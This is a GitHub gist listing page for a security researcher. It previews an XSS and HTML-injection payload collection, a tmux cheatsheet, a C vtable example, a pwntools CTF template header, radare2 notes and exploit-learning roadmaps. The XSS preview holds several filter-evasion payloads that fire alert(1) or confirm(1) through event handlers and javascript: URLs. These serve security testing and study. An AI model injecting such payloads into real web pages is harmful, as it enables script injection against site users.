Skip to content

Instantly share code, notes, and snippets.

View tin-z's full-sized avatar
:octocat:
🔥 ⌨️

Altin (tin-z) tin-z

:octocat:
🔥 ⌨️
82 followers · 262 following
View GitHub Profile
@tin-z
tin-z / XSS, Cross Site Scripting, Javascript, Meta, HTML Injection Signatures
Created October 7, 2019 18:22 — forked from xsscx/XSS, Cross Site Scripting, Javascript, Meta, HTML Injection Signatures
XSS, Cross Site Scripting, Javascript, Meta, HTML Injection Signatures
/* Remote File Include with HTML TAGS via XSS.Cx */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */
/* Updated September 29, 2014 */
/* RFI START */
<img language=vbs src=<b onerror=alert#1/1#>
<isindex action="javas&Tab;cript:alert(1)" type=image>
"]<img src=1 onerror=alert(1)>
<input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span>
@tin-z
tin-z / tmux-cheatsheet.markdown
Created April 26, 2020 13:00 — forked from MohamedAlaa/tmux-cheatsheet.markdown
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
@tin-z
tin-z / Class-in-C.c
Created May 8, 2020 17:49
#include <stdio.h>
// skel Virtual function table (VFT)
struct file_operations {
int (*read) (struct Classe1 *, char **);
int (*write) (struct Classe1 *, char **, char **);
};
// skel classe
struct Classe1 {
const struct file_operations *f_op;
@tin-z
tin-z / CTF-pwn-template.py
Last active July 10, 2021 21:44
#!/usr/bin/env python3
from pwn import *
import signal
import sys
import subprocess
# requirements:
# $ python3 -m pip install pwntools --user
# UTILS
@tin-z
tin-z / yet another radare2 cheatsheet.md
Last active September 16, 2020 21:59 — forked from williballenthin/yet another radare2 cheatsheet.md

radare2

Basics

load without any analysis (file header at offset 0x0): r2 -n /path/to/file

  • analyze all: aa
  • show sections: iS
  • list functions: afl
  • list imports: ii
@tin-z
tin-z / roadmap_windows_exploit.md
Last active November 5, 2020 10:19
Roadmap for learning Windows exploit techniques
@tin-z
tin-z / roadmap_web_hacking_wapt.md
Last active April 2, 2023 22:03
@tin-z
tin-z / roadmap_network-infrastructure_pen_testing.md
Last active March 21, 2021 16:41
@tin-z
tin-z / scheappes.py
Created May 9, 2021 19:22
import sys, os
import ctypes
import math
import struct
#### Ignore ####
EC = '\x1b[0m'
BOLD = '\x1b[1m'
@tin-z
tin-z / Makefile
Created June 6, 2021 10:54 — forked from kwk/Makefile
Compiling with Address Sanitizer (ASAN) with CLANG and with GCC-4.8
.PHONY: using-gcc using-gcc-static using-clang
using-gcc:
g++-4.8 -o main-gcc -lasan -O -g -fsanitize=address -fno-omit-frame-pointer main.cpp && \
ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=$(shell which llvm-symbolizer) ./main-gcc
using-gcc-static:
g++-4.8 -o main-gcc-static -static-libstdc++ -static-libasan -O -g -fsanitize=address -fno-omit-frame-pointer main.cpp && \
ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=$(shell which llvm-symbolizer) ./main-gcc-static